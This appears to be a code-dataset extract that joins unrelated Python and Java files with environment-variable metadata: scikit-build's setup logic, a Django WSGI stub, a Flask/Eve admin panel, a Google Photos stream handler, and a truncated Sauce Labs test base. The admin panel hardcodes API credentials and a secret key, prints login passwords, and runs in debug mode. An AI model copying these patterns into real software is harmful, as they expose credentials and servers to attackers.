"an absolute path. A relative path is expected.\n"
" Project Root : {}\n"
" CMake Install Directory: {}\n"
).format(os.getcwd(), cmake_install_dir)
)
cmake_source_dir = skbuild_kw["cmake_source_dir"]
if not os.path.exists(os.path.abspath(cmake_source_dir)):
raise SKBuildError(
(
"\n setup parameter 'cmake_source_dir' set to "
"a nonexistent directory.\n"
" Project Root : {}\n"
" CMake Source Directory: {}\n"
).format(os.getcwd(), cmake_source_dir)
)
def strip_package(package_parts, module_file):
"""Given ``package_parts`` (e.g. ``['foo', 'bar']``) and a
``module_file`` (e.g. ``foo/bar/jaz/rock/roll.py``), starting
from the left, this function will strip the parts of the path
matching the package parts and return a new string
(e.g ``jaz/rock/roll.py``).
The function will work as expected for either Windows or Unix-style
``module_file`` and this independently of the platform.
"""
if not package_parts or os.path.isabs(module_file):
return module_file
package = "/".join(package_parts)
module_dir = os.path.dirname(module_file.replace("\\", "/"))
module_dir = module_dir[: len(package)]
return module_file[len(package) + 1 :] if package != "" and module_dir.startswith(package) else module_file
def _package_data_contain_module(module, package_data):
"""Return True if the ``module`` is contained
in the ``package_data``.
``module`` is a tuple of the form
``(package, modulename, module_file)``.
"""
(package, _, module_file) = module
if package not in package_data:
return False
# We need to strip the package because a module entry
# usually looks like this:
#
# ('foo.bar', 'module', 'foo/bar/module.py')
#
# and the entry in package_data would look like this:
#
# {'foo.bar' : ['module.py']}
if strip_package(package.split("."), module_file) in package_data[package]:
return True
return False
def _should_run_cmake(commands, cmake_with_sdist):
"""Return True if at least one command requiring ``cmake`` to run
is found in ``commands``."""
for expected_command in [
"build",
"build_ext",
"develop",
"install",
"install_lib",
"bdist",
"bdist_dumb",
"bdist_egg",
"bdist_rpm",
"bdist_wininst",
"bdist_wheel",
"test",
]:
if expected_command in commands:
return True
if "sdist" in commands and cmake_with_sdist:
return True
return False
def _save_cmake_spec(args):
"""Save the CMake spec to disk"""
# We use JSON here because readability is more important than performance
try:
os.makedirs(os.path.dirname(CMAKE_SPEC_FILE()))
except OSError:
pass
with open(CMAKE_SPEC_FILE(), "w+") as fp:
json.dump(args, fp)
def _load_cmake_spec():
"""Load and return the CMake spec from disk"""
try:
with open(CMAKE_SPEC_FILE()) as fp:
return json.load(fp)
except (OSError, IOError, ValueError):
return None
# pylint:disable=too-many-locals, too-many-branches
def setup(*args, **kw): # noqa: C901
"""This function wraps setup() so that we can run cmake, make,
CMake build, then proceed as usual with setuptools, appending the
CMake-generated output as necessary.
The CMake project is re-configured only if needed. This is achieved by (1) retrieving the environment mapping
associated with the generator set in the ``CMakeCache.txt`` file, (2) saving the CMake configure arguments and
version in :func:`skbuild.constants.CMAKE_SPEC_FILE()`: and (3) re-configuring only if either the generator or
the CMake specs change.
"""
# If any, strip ending slash from each package directory
# Regular setuptools does not support this
# TODO: will become an error in the future
if "package_dir" in kw:
for package, prefix in kw["package_dir"].items():
if prefix.endswith("/"):
msg = "package_dir={{{!r}: {!r}}} ends with a trailing slash, which is not supported by setuptools.".format(
package, prefix
)
warnings.warn(msg, FutureWarning, stacklevel=2)
kw["package_dir"][package] = prefix[:-1]
sys.argv, cmake_executable, skip_generator_test, cmake_args, make_args = parse_args()
# work around https://bugs.python.org/issue1011113
# (patches provided, but no updates since 2014)
cmdclass = kw.get("cmdclass", {})
cmdclass["build"] = cmdclass.get("build", build.build)
cmdclass["build_py"] = cmdclass.get("build_py", build_py.build_py)
cmdclass["build_ext"] = cmdclass.get("build_ext", build_ext.build_ext)
cmdclass["install"] = cmdclass.get("install", install.install)
cmdclass["install_lib"] = cmdclass.get("install_lib", install_lib.install_lib)
cmdclass["install_scripts"] = cmdclass.get("install_scripts", install_scripts.install_scripts)
cmdclass["clean"] = cmdclass.get("clean", clean.clean)
cmdclass["sdist"] = cmdclass.get("sdist", sdist.sdist)
cmdclass["bdist"] = cmdclass.get("bdist", bdist.bdist)
cmdclass["bdist_wheel"] = cmdclass.get("bdist_wheel", bdist_wheel.bdist_wheel)
cmdclass["egg_info"] = cmdclass.get("egg_info", egg_info.egg_info)
cmdclass["generate_source_manifest"] = cmdclass.get(
"generate_source_manifest", generate_source_manifest.generate_source_manifest
)
cmdclass["test"] = cmdclass.get("test", test.test)
kw["cmdclass"] = cmdclass
# Extract setup keywords specific to scikit-build and remove them from kw.
# Removing the keyword from kw need to be done here otherwise, the
# following call to _parse_setuptools_arguments would complain about
# unknown setup options.
parameters = {
"cmake_args": [],
"cmake_install_dir": "",
"cmake_source_dir": "",
"cmake_with_sdist": False,
"cmake_languages": ("C", "CXX"),
"cmake_minimum_required_version": None,
"cmake_process_manifest_hook": None,
"cmake_install_target": "install",
}
skbuild_kw = {param: kw.pop(param, value) for param, value in parameters.items()}
# ... and validate them
try:
_check_skbuild_parameters(skbuild_kw)
except SKBuildError as ex:
import traceback # pylint: disable=import-outside-toplevel
print("Traceback (most recent call last):")
traceback.print_tb(sys.exc_info()[2])
print("")
sys.exit(ex)
# Convert source dir to a path relative to the root
# of the project
cmake_source_dir = skbuild_kw["cmake_source_dir"]
if cmake_source_dir == ".":
cmake_source_dir = ""
if os.path.isabs(cmake_source_dir):
cmake_source_dir = os.path.relpath(cmake_source_dir)
# Skip running CMake in the following cases:
# * flag "--skip-cmake" is provided
# * "display only" argument is provided (e.g '--help', '--author', ...)
# * no command-line arguments or invalid ones are provided
# * no command requiring cmake is provided
# * no CMakeLists.txt if found
display_only = has_invalid_arguments = help_commands = False
force_cmake = skip_cmake = False
commands = []
try:
(
display_only,
help_commands,
commands,
hide_listing,
force_cmake,
skip_cmake,
plat_name,
build_ext_inplace,
) = _parse_setuptools_arguments(kw)
except (DistutilsArgError, DistutilsGetoptError):
has_invalid_arguments = True
has_cmakelists = os.path.exists(os.path.join(cmake_source_dir, "CMakeLists.txt"))
if not has_cmakelists:
print("skipping skbuild (no CMakeLists.txt found)")
skip_skbuild = (
display_only
or has_invalid_arguments
or not _should_run_cmake(commands, skbuild_kw["cmake_with_sdist"])
or not has_cmakelists
)
if skip_skbuild and not force_cmake:
if help_commands:
# Prepend scikit-build help. Generate option descriptions using
# argparse.
skbuild_parser = create_skbuild_argparser()
arg_descriptions = [line for line in skbuild_parser.format_help().split("\n") if line.startswith(" ")]
print("scikit-build options:")
print("\n".join(arg_descriptions))
print("")
print('Arguments following a "--" are passed directly to CMake ' "(e.g. -DMY_VAR:BOOL=TRUE).")
print('Arguments following a second "--" are passed directly to ' " the build tool.")
print("")
return setuptools.setup(*args, **kw)
developer_mode = "develop" in commands or "test" in commands or build_ext_inplace
packages = kw.get("packages", [])
package_dir = kw.get("package_dir", {})
package_data = copy.deepcopy(kw.get("package_data", {}))
py_modules = kw.get("py_modules", [])
new_py_modules = {py_module: False for py_module in py_modules}
scripts = kw.get("scripts", [])
new_scripts = {script: False for script in scripts}
data_files = {(parent_dir or "."): set(file_list) for parent_dir, file_list in kw.get("data_files", [])}
# Since CMake arguments provided through the command line have more
# weight and when CMake is given multiple times a argument, only the last
# one is considered, let's prepend the one provided in the setup call.
cmake_args = skbuild_kw["cmake_args"] + cmake_args
# Handle cmake_install_target
# get the target (next item after '--install-target') or return '' if no --install-target
cmake_install_target_from_command = next(
(make_args[index + 1] for index, item in enumerate(make_args) if item == "--install-target"), ""
)
cmake_install_target_from_setup = skbuild_kw["cmake_install_target"]
# Setting target from command takes precedence
# cmake_install_target_from_setup has the default 'install',
# so cmake_install_target would never be empty.
if cmake_install_target_from_command:
cmake_install_target = cmake_install_target_from_command
else:
cmake_install_target = cmake_install_target_from_setup
# Parse CMAKE_ARGS
env_cmake_args = os.environ["CMAKE_ARGS"].split() if "CMAKE_ARGS" in os.environ else []
env_cmake_args = [s for s in env_cmake_args if "CMAKE_INSTALL_PREFIX" not in s]
# Using the environment variable CMAKE_ARGS has lower precedence than manual options
cmake_args = env_cmake_args + cmake_args
if sys.platform == "darwin":
# If no ``--plat-name`` argument was passed, set default value.
if plat_name is None:
plat_name = skbuild_plat_name()
(_, version, machine) = plat_name.split("-")
# The loop here allows for CMAKE_OSX_* command line arguments to overload
# values passed with either the ``--plat-name`` command-line argument
# or the ``cmake_args`` setup option.
for cmake_arg in cmake_args:
if "CMAKE_OSX_DEPLOYMENT_TARGET" in cmake_arg:
version = cmake_arg.split("=")[1]
if "CMAKE_OSX_ARCHITECTURES" in cmake_arg:
machine = cmake_arg.split("=")[1]
if set(machine.split(";")) == {"x86_64", "arm64"}:
machine = "universal2"
set_skbuild_plat_name("macosx-{}-{}".format(version, machine))
# Set platform env. variable so that commands (e.g. bdist_wheel)
# uses this information. The _PYTHON_HOST_PLATFORM env. variable is
# used in distutils.util.get_platform() function.
os.environ.setdefault("_PYTHON_HOST_PLATFORM", skbuild_plat_name())
# Set CMAKE_OSX_DEPLOYMENT_TARGET and CMAKE_OSX_ARCHITECTURES if not already
# specified
(_, version, machine) = skbuild_plat_name().split("-")
if not cmaker.has_cmake_cache_arg(cmake_args, "CMAKE_OSX_DEPLOYMENT_TARGET"):
cmake_args.append("-DCMAKE_OSX_DEPLOYMENT_TARGET:STRING=%s" % version)
if not cmaker.has_cmake_cache_arg(cmake_args, "CMAKE_OSX_ARCHITECTURES"):
machine_archs = "x86_64;arm64" if machine == "universal2" else machine
cmake_args.append("-DCMAKE_OSX_ARCHITECTURES:STRING=%s" % machine_archs)
# Install cmake if listed in `setup_requires`
for package in kw.get("setup_requires", []):
if Requirement(package).name == "cmake":
setup_requires = [package]
dist = upstream_Distribution({"setup_requires": setup_requires})
dist.fetch_build_eggs(setup_requires)
# Considering packages associated with "setup_requires" keyword are
# installed in .eggs subdirectory without honoring setuptools "console_scripts"
# entry_points and without settings the expected executable permissions, we are
# taking care of it below.
import cmake # pylint: disable=import-outside-toplevel
for executable in ["cmake", "cpack", "ctest"]:
executable = os.path.join(cmake.CMAKE_BIN_DIR, executable)
if platform.system().lower() == "windows":
executable += ".exe"
st = os.stat(executable)
permissions = st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(executable, permissions)
cmake_executable = os.path.join(cmake.CMAKE_BIN_DIR, "cmake")
break
# Languages are used to determine a working generator
cmake_languages = skbuild_kw["cmake_languages"]
try:
if cmake_executable is None:
cmake_executable = CMAKE_DEFAULT_EXECUTABLE
cmkr = cmaker.CMaker(cmake_executable)
if not skip_cmake:
cmake_minimum_required_version = skbuild_kw["cmake_minimum_required_version"]
if cmake_minimum_required_version is not None:
if parse_version(cmkr.cmake_version) < parse_version(cmake_minimum_required_version):
raise SKBuildError(
"CMake version {} or higher is required. CMake version {} is being used".format(
cmake_minimum_required_version, cmkr.cmake_version
)
)
# Used to confirm that the cmake executable is the same, and that the environment
# didn't change
cmake_spec = {
"args": [which(CMAKE_DEFAULT_EXECUTABLE)] + cmake_args,
"version": cmkr.cmake_version,
"environment": {
"PYTHONNOUSERSITE": os.environ.get("PYTHONNOUSERSITE"),
"PYTHONPATH": os.environ.get("PYTHONPATH"),
},
}
# skip the configure step for a cached build
env = cmkr.get_cached_generator_env()
if env is None or cmake_spec != _load_cmake_spec():
env = cmkr.configure(
cmake_args,
skip_generator_test=skip_generator_test,
cmake_source_dir=cmake_source_dir,
cmake_install_dir=skbuild_kw["cmake_install_dir"],
languages=cmake_languages,
)
_save_cmake_spec(cmake_spec)
cmkr.make(make_args, install_target=cmake_install_target, env=env)
except SKBuildGeneratorNotFoundError as ex:
sys.exit(ex)
except SKBuildError as ex:
import traceback # pylint: disable=import-outside-toplevel
print("Traceback (most recent call last):")
traceback.print_tb(sys.exc_info()[2])
print("")
sys.exit(ex)
# If needed, set reasonable defaults for package_dir
for package in packages:
if package not in package_dir:
package_dir[package] = package.replace(".", "/")
if "" in package_dir:
package_dir[package] = to_unix_path(os.path.join(package_dir[""], package_dir[package]))
kw["package_dir"] = package_dir
package_prefixes = _collect_package_prefixes(package_dir, packages)
# This hook enables custom processing of the cmake manifest
cmake_manifest = cmkr.install()
process_manifest = skbuild_kw.get("cmake_process_manifest_hook")
if process_manifest is not None:
if callable(process_manifest):
cmake_manifest = process_manifest(cmake_manifest)
else:
raise SKBuildError("The cmake_process_manifest_hook argument should be callable.")
_classify_installed_files(
cmake_manifest,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
skbuild_kw["cmake_install_dir"],
)
original_manifestin_data_files = []
if kw.get("include_package_data", False):
original_manifestin_data_files = parse_manifestin(os.path.join(os.getcwd(), "MANIFEST.in"))
for path in original_manifestin_data_files:
_classify_file(
path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files
)
if developer_mode:
# Copy packages
for package, package_file_list in package_data.items():
for package_file in package_file_list:
package_file = os.path.join(package_dir[package], package_file)
cmake_file = os.path.join(CMAKE_INSTALL_DIR(), package_file)
if os.path.exists(cmake_file):
_copy_file(cmake_file, package_file, hide_listing)
# Copy modules
for py_module in py_modules:
package_file = py_module + ".py"
cmake_file = os.path.join(CMAKE_INSTALL_DIR(), package_file)
if os.path.exists(cmake_file):
_copy_file(cmake_file, package_file, hide_listing)
else:
_consolidate_package_modules(cmake_source_dir, packages, package_dir, py_modules, package_data, hide_listing)
original_package_data = kw.get("package_data", {}).copy()
_consolidate_package_data_files(original_package_data, package_prefixes, hide_listing)
for data_file in original_manifestin_data_files:
dest_data_file = os.path.join(CMAKE_INSTALL_DIR(), data_file)
_copy_file(data_file, dest_data_file, hide_listing)
kw["package_data"] = package_data
kw["package_dir"] = {
package: (
os.path.join(CMAKE_INSTALL_DIR(), prefix)
if os.path.exists(os.path.join(CMAKE_INSTALL_DIR(), prefix))
else prefix
)
for prefix, package in package_prefixes
}
kw["scripts"] = [
os.path.join(CMAKE_INSTALL_DIR(), script) if mask else script for script, mask in new_scripts.items()
]
kw["data_files"] = [(parent_dir, list(file_set)) for parent_dir, file_set in data_files.items()]
if "zip_safe" not in kw:
kw["zip_safe"] = False
# Adapted from espdev/ITKPythonInstaller/setup.py.in
class BinaryDistribution(upstream_Distribution): # pylint: disable=missing-class-docstring
def has_ext_modules(self): # pylint: disable=no-self-use,missing-function-docstring
return has_cmakelists
kw["distclass"] = BinaryDistribution
print("")
return setuptools.setup(*args, **kw)
def _collect_package_prefixes(package_dir, packages):
"""
Collect the list of prefixes for all packages
The list is used to match paths in the install manifest to packages
specified in the setup.py script.
The list is sorted in decreasing order of prefix length so that paths are
matched with their immediate parent package, instead of any of that
package's ancestors.
For example, consider the project structure below. Assume that the
setup call was made with a package list featuring "top" and "top.bar", but
not "top.not_a_subpackage".
::
top/ -> top/
__init__.py -> top/__init__.py (parent: top)
foo.py -> top/foo.py (parent: top)
bar/ -> top/bar/ (parent: top)
__init__.py -> top/bar/__init__.py (parent: top.bar)
not_a_subpackage/ -> top/not_a_subpackage/ (parent: top)
data_0.txt -> top/not_a_subpackage/data_0.txt (parent: top)
data_1.txt -> top/not_a_subpackage/data_1.txt (parent: top)
The paths in the generated install manifest are matched to packages
according to the parents indicated on the right. Only packages that are
specified in the setup() call are considered. Because of the sort order,
the data files on the bottom would have been mapped to
"top.not_a_subpackage" instead of "top", proper -- had such a package been
specified.
"""
return list(
sorted(
((package_dir[package].replace(".", "/"), package) for package in packages),
key=lambda tup: len(tup[0]),
reverse=True,
)
)
def _classify_installed_files(
install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
_cmake_install_dir,
):
assert not os.path.isabs(cmake_source_dir)
assert cmake_source_dir != "."
install_root = os.path.join(os.getcwd(), CMAKE_INSTALL_DIR())
for path in install_paths:
# if this installed file is not within the project root, complain and
# exit
if not to_platform_path(path).startswith(CMAKE_INSTALL_DIR()):
raise SKBuildError(
(
"\n CMake-installed files must be within the project root.\n"
" Project Root : {}\n"
" Violating File: {}\n"
).format(install_root, to_platform_path(path))
)
# peel off the 'skbuild' prefix
path = to_unix_path(os.path.relpath(path, CMAKE_INSTALL_DIR()))
_classify_file(
path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files
)
def _classify_file(path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files):
found_package = False
found_module = False
found_script = False
path = to_unix_path(path)
# check to see if path is part of a package
for prefix, package in package_prefixes:
if path.startswith(prefix + "/"):
# peel off the package prefix
path = to_unix_path(os.path.relpath(path, prefix))
package_file_list = package_data.get(package, [])
package_file_list.append(path)
package_data[package] = package_file_list
found_package = True
break
if found_package:
return
# If control reaches this point, then this installed file is not part of
# a package.
# check if path is a module
for module in py_modules:
if path.replace("/", ".") == ".".join((module, "py")):
new_py_modules[module] = True
found_module = True
break
if found_module:
return
# If control reaches this point, then this installed file is not a
# module
# if the file is a script, mark the corresponding script
for script in scripts:
if path == script:
new_scripts[script] = True
found_script = True
break
if found_script:
return
# If control reaches this point, then this installed file is not a
# script
# If control reaches this point, then we have installed files that are
# not part of a package, not a module, nor a script. Without any other
# information, we can only treat it as a generic data file.
parent_dir = os.path.dirname(path)
file_set = data_files.get(parent_dir)
if file_set is None:
file_set = set()
data_files[parent_dir] = file_set
file_set.add(os.path.join(CMAKE_INSTALL_DIR(), path))
def _copy_file(src_file, dest_file, hide_listing=True):
"""Copy ``src_file`` to ``dest_file`` ensuring parent directory exists.
By default, message like `creating directory /path/to/package` and
`copying directory /src/path/to/package -> path/to/package` are displayed
on standard output. Setting ``hide_listing`` to False avoids message from
being displayed.
"""
# Create directory if needed
dest_dir = os.path.dirname(dest_file)
if dest_dir != "" and not os.path.exists(dest_dir):
if not hide_listing:
print("creating directory {}".format(dest_dir))
mkdir_p(dest_dir)
# Copy file
if not hide_listing:
print("copying {} -> {}".format(src_file, dest_file))
copyfile(src_file, dest_file)
copymode(src_file, dest_file)
def _consolidate_package_modules(cmake_source_dir, packages, package_dir, py_modules, package_data, hide_listing):
"""This function consolidates packages having modules located in
both the source tree and the CMake install tree into one location.
The one location is the CMake install tree
(see :func:`.constants.CMAKE_INSTALL_DIR()`).
Why ? This is a necessary evil because ``Setuptools`` keeps track of
packages and modules files to install using a dictionary of lists where
the key are package names (e.g ``foo.bar``) and the values are lists of
module files (e.g ``['__init__.py', 'baz.py']``. Since this doesn't allow
to "split" files associated with a given module in multiple location, one
location is selected, and files are copied over.
How? It currently searches for modules across both locations using
the :class:`.utils.PythonModuleFinder`. then with the help
of :func:`_package_data_contain_module`, it identifies which
one are either already included or missing from the distribution.
Once a module has been identified as ``missing``, it is both copied
into the :func:`.constants.CMAKE_INSTALL_DIR()` and added to the
``package_data`` dictionary so that it can be considered by
the upstream setup function.
"""
try:
# Search for python modules in both the current directory
# and cmake install tree.
modules = PythonModuleFinder(
packages, package_dir, py_modules, alternative_build_base=CMAKE_INSTALL_DIR()
).find_all_modules()
except DistutilsError as msg:
raise SystemExit("error: {}".format(str(msg)))
print("")
for entry in modules:
# Check if module file should be copied into the CMake install tree.
if _package_data_contain_module(entry, package_data):
continue
(package, _, src_module_file) = entry
# Copy missing module file
if os.path.exists(src_module_file):
dest_module_file = os.path.join(CMAKE_INSTALL_DIR(), src_module_file)
_copy_file(src_module_file, dest_module_file, hide_listing)
# Since the mapping in package_data expects the package to be associated
# with a list of files relative to the directory containing the package,
# the following section makes sure to strip the redundant part of the
# module file path.
# The redundant part should be stripped for both cmake_source_dir and
# the package.
package_parts = []
if cmake_source_dir:
package_parts = cmake_source_dir.split(os.path.sep)
package_parts += package.split(".")
stripped_module_file = strip_package(package_parts, src_module_file)
# Update list of files associated with the corresponding package
try:
package_data[package].append(stripped_module_file)
except KeyError:
package_data[package] = [stripped_module_file]
def _consolidate_package_data_files(original_package_data, package_prefixes, hide_listing):
"""This function copies package data files specified using the ``package_data`` keyword
into :func:`.constants.CMAKE_INSTALL_DIR()`.
::
setup(...,
packages=['mypkg'],
package_dir={'mypkg': 'src/mypkg'},
package_data={'mypkg': ['data/*.dat']},
)
Considering that (1) the packages associated with modules located in both the source tree and
the CMake install tree are consolidated into the CMake install tree, and (2) the consolidated
package path set in the ``package_dir`` dictionary and later used by setuptools to package
(or install) modules and data files is :func:`.constants.CMAKE_INSTALL_DIR()`, copying the data files
is required to ensure setuptools can find them when it uses the package directory.
"""
project_root = os.getcwd()
for prefix, package in package_prefixes:
if package not in original_package_data:
continue
raw_patterns = original_package_data[package]
for pattern in raw_patterns:
expanded_package_dir = os.path.join(project_root, prefix, pattern)
for src_data_file in glob(expanded_package_dir):
full_prefix_length = len(os.path.join(project_root, prefix)) + 1
data_file = src_data_file[full_prefix_length:]
dest_data_file = os.path.join(CMAKE_INSTALL_DIR(), prefix, data_file)
_copy_file(src_data_file, dest_data_file, hide_listing)
| []
| []
| [
"PYTHONNOUSERSITE",
"CMAKE_ARGS",
"PYTHONPATH"
]
| [] | ["PYTHONNOUSERSITE", "CMAKE_ARGS", "PYTHONPATH"] | python | 3 | 0 | |
agreelance/wsgi.py | """
WSGI config for agreelance project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "agreelance.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
ADMIN/app/server.py | #Importing required libraries
from flask import request,render_template,redirect,url_for,json,session
from eve import Eve
from eve.auth import BasicAuth
from bson import ObjectId
from bson.json_util import dumps
from datetime import datetime,timedelta
from functools import wraps
import bcrypt
import os
#Defining directories for static files and views
PWD = os.environ.get('PWD')
templates = os.path.join(PWD,'templates')
static = os.path.join(PWD,'static')
#BasicAuth to protect API routes
class MyBasicAuth(BasicAuth):
def check_auth(self,username,password,allowed_roles,resource,method):
return username == 'Admin@surabi' and password == 'aDm!n@surab!'
#App - eve instance
app = Eve(auth=MyBasicAuth,static_folder=static,template_folder=templates)
app.secret_key = "b859cc924ec74258b675e3cd0df68e41bd6bc75c103a439f42"
#Login required decorator - wrapper
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
return redirect(url_for('login'))
return wrap
#API root
@app.route('/')
def rootURL():
return render_template('login.html')
#Login route
@app.route('/login',methods=['POST'])
def login():
error = None
email = request.form['inputUsername']
password = request.form['inputPassword']
print email
print password
account = app.data.driver.db['Admin']
account = account.find_one({'email': email})
if account and bcrypt.hashpw(password.encode('utf-8'),account['salt'].encode('utf-8')) == account['password']:
session['logged_in'] = True
session['_id'] = str(account['_id'])
return redirect(url_for('dashboard'))
else:
error = 'Invalid credentials.Please try again.'
return render_template('login.html',error=error), 400
#Create Admin
@app.route('/create',methods=['GET','POST'])
@login_required
def createAdmin():
if request.method == "GET":
return render_template('createAdmin.html')
success_msg = "Successfully Added!"
err_msg = "OOPS!Some technical issue has occured!"
name = request.form['name']
email = request.form['email']
password = request.form['password']
salt = bcrypt.gensalt(8).encode('utf-8')
if(name == None or email == None or password == None):
return json.dumps({'Err':'Missing parameters'}), 400, {'ContentType':'application/json'}
password = password.encode('utf-8')
password = bcrypt.hashpw(password,salt)
payload = {
"name" : name,
"email" : email,
"password" : password,
"salt" : salt,
"_created" : datetime.utcnow()
}
Admin = app.data.driver.db['Admin']
resp = Admin.insert(payload)
if type(resp) == ObjectId:
return render_template('createAdmin.html',success_msg=success_msg), 201
else:
return render_template('createAdmin.html',err_msg=err_msg), 400
#Approve student/mentor
@app.route('/approve/<userType>',methods=['POST','GET'])
@login_required
def approve(userType):
if userType == "mentor":
mentorId = request.form.get('mentorId')
mentor = app.data.driver.db['Mentor']
resp = mentor.update_one({
'_id': ObjectId(mentorId)
},{
'$set': {
'isApproved': True
}
}, upsert=False)
return 'OK',200
if userType == "student":
studentId = request.form.get('studentId')
student = app.data.driver.db['Student']
resp = student.update_one({
'_id': ObjectId(studentId)
},{
'$set': {
'isApproved': True
}
}, upsert=False)
return json.dumps({'success':True}), 200
#Dashboard route
@app.route('/dashboard',methods=['GET'])
@login_required
def dashboard():
mentor = app.data.driver.db['Mentor']
mentor_length = len(list(mentor.find()))
student = app.data.driver.db['Student']
student_length = len(list(student.find()))
date_dif = datetime.now() - timedelta(days=14)
Assignment = app.data.driver.db['Assignment']
ids = Assignment.find({'updated_at':{"$lt":str(date_dif)}}).distinct('student_id')
def cvrt(id) : return ObjectId(id)
ids = map(cvrt,ids);
inactive_users = list(student.find({'_id': {"$in": ids}}))
course = app.data.driver.db['Course']
course_list = list(course.find())
return render_template('dashboard.html',mentor_length = mentor_length,student_length = student_length,inactive_users = inactive_users, course_list = course_list)
#Deactivate student/mentor
@app.route('/deactivate/<userType>',methods=['POST','GET'])
@login_required
def deactivate(userType):
if userType == "mentor":
mentorId = request.form.get('mentorId')
mentor = app.data.driver.db['Mentor']
resp = mentor.update_one({
'_id': ObjectId(mentorId)
},{
'$set': {
'isApproved': False
}
}, upsert=False)
return json.dumps({'success':True}), 200
if userType == "student":
studentId = request.form.get('studentId')
student = app.data.driver.db['Student']
resp = student.update_one({
'_id': ObjectId(studentId)
},{
'$set': {
'isApproved': False
}
}, upsert=False)
return json.dumps({'success':True}), 200
#View all mentors/students
@app.route('/view/<userType>',methods=['GET'])
@login_required
def view(userType):
if userType == "mentors":
mentor = app.data.driver.db['Mentor']
mentors = dumps(mentor.find({}))
return json.dumps(mentors), 200
if userType == "students":
student = app.data.driver.db['Student']
students = dumps(student.find({}))
return json.dumps(students), 200
#Mentor view
@app.route('/mentor')
@login_required
def mentor():
mentor = app.data.driver.db['Mentor']
mentor_list = list(mentor.find())
return render_template('mentors.html',mentor_list=mentor_list)
#Student view
@app.route('/student')
@login_required
def student():
student = app.data.driver.db['Student']
student_list = list(student.find())
return render_template('students.html',student_list=student_list)
#Logout
@app.route('/logout')
@login_required
def logout():
session.pop('logged_in', None)
session.pop('id', None)
return redirect(url_for('rootURL'))
#Server startup
app.run(debug=True,port=8585)
| []
| []
| [
"PWD"
]
| [] | ["PWD"] | python | 1 | 0 | |
web/server/logic/streams.py | from google.appengine.ext import ndb
import os
from google.appengine.api import app_identity
from models import Photo
from googlephotos.google_photos import GooglePhotos
from photo_storage import read_photo_from_storage, write_photo_to_storage
class PhotoInfo:
def __init__(self, id):
self.id = id
def serialize(self):
return {
'id': self.id
}
def get_stream_photos(stream, max_pages):
if (stream.type == 'files'):
photos_query = Photo.query(ancestor=stream.key)
photos = photos_query.fetch(1000)
return [PhotoInfo(photo.key.id()) for photo in photos]
elif (stream.type == 'google-photos-album'):
google_auth = stream.google_auth_key.get()
google_photos = GooglePhotos(google_auth)
photos = google_photos.get_album_photos(stream.google_album_id, max_pages)
return [PhotoInfo(photo['id']) for photo in photos]
return photos
def get_photo(stream, photo_id, photo_label, web_handler):
if (stream.type == 'files'):
photo_key = ndb.Key('Photo', int(photo_id), parent=stream.key)
photo = photo_key.get()
bucket_name = os.environ.get('BUCKET_NAME',
app_identity.get_default_gcs_bucket_name())
read_photo_from_storage(photo, photo_label, web_handler.response)
elif (stream.type == 'google-photos-album'):
google_auth = stream.google_auth_key.get()
google_photos = GooglePhotos(google_auth)
photo_url = google_photos.get_album_photo_url(photo_id)
if (photo_label == 'main'):
photo_url += '=d' # add the download parameter (https://developers.google.com/photos/library/guides/access-media-items#image-base-urls)
else:
photo_url += '=w206-h160' # add width & height parameters
return web_handler.redirect(str(photo_url))
else:
web_handler.response.status = 500
web_handler.response.write('stream type not supported')
| []
| []
| [
"BUCKET_NAME"
]
| [] | ["BUCKET_NAME"] | python | 1 | 0 | |
appium_example/src/test/java/example/ios/Tests/TestBase.java | package example.ios.Tests;
// import Sauce TestNG helper libraries
import com.saucelabs.common.SauceOnDemandAuthentication;
import com.saucelabs.common.SauceOnDemandSessionIdProvider;
import com.saucelabs.testng.SauceOnDemandAuthenticationProvider;
import io.appium.java_client.ios.IOSDriver;
import io.appium.java_client.AppiumDriver;
import com.saucelabs.testng.SauceOnDemandTestListener;
import org.openqa.selenium.MutableCapabilities;
import org.openqa.selenium.remote.CapabilityType;
import org.openqa.selenium.remote.DesiredCapabilities;
import org.openqa.selenium.remote.RemoteWebDriver;
import org.testng.annotations.AfterMethod;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Listeners;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.rmi.UnexpectedException;
// import testng annotations
// import java libraries
/**
* Simple TestNG test which demonstrates being instantiated via a DataProvider in order to supply multiple browser combinations.
*
* @author Neil Manvar
*/
@Listeners({SauceOnDemandTestListener.class})
public class TestBase implements SauceOnDemandSessionIdProvider, SauceOnDemandAuthenticationProvider {
public String seleniumURI = "@ondemand.saucelabs.com:443";
public String buildTag = System.getenv("BUILD_TAG");
public String username = System.getenv("SAUCE_USERNAME");
public String accesskey = System.getenv("SAUCE_ACCESS_KEY");
public String app = "https://github.com/saucelabs-sample-test-frameworks/Java-Junit-Appium-iOS/blob/master/resources/SauceGuineaPig-sim-debug.app.zip?raw=true";
/**
* Constructs a {@link SauceOnDemandAuthentication} instance using the supplied user name/access key. To use the authentication
* supplied by environment variables or from an external file, use the no-arg {@link SauceOnDemandAuthentication} constructor.
*/
public SauceOnDemandAuthentication authentication = new SauceOnDemandAuthentication(username, accesskey);
/**
* ThreadLocal variable which contains the {@link IOSDriver} instance which is used to perform browser interactions with.
*/
private ThreadLocal<IOSDriver> iosDriver = new ThreadLocal<IOSDriver>();
/**
* ThreadLocal variable which contains the Sauce Job Id.
*/
private ThreadLocal<String> sessionId = new ThreadLocal<String>();
/**
* DataProvider that explicitly sets the browser combinations to be used.
*
* @param testMethod
* @return Two dimensional array of objects with browser, version, and platform information
*/
@DataProvider(name = "hardCodedBrowsers", parallel = true)
public static Object[][] sauceBrowserDataProvider(Method testMethod) {
return new Object[][]{
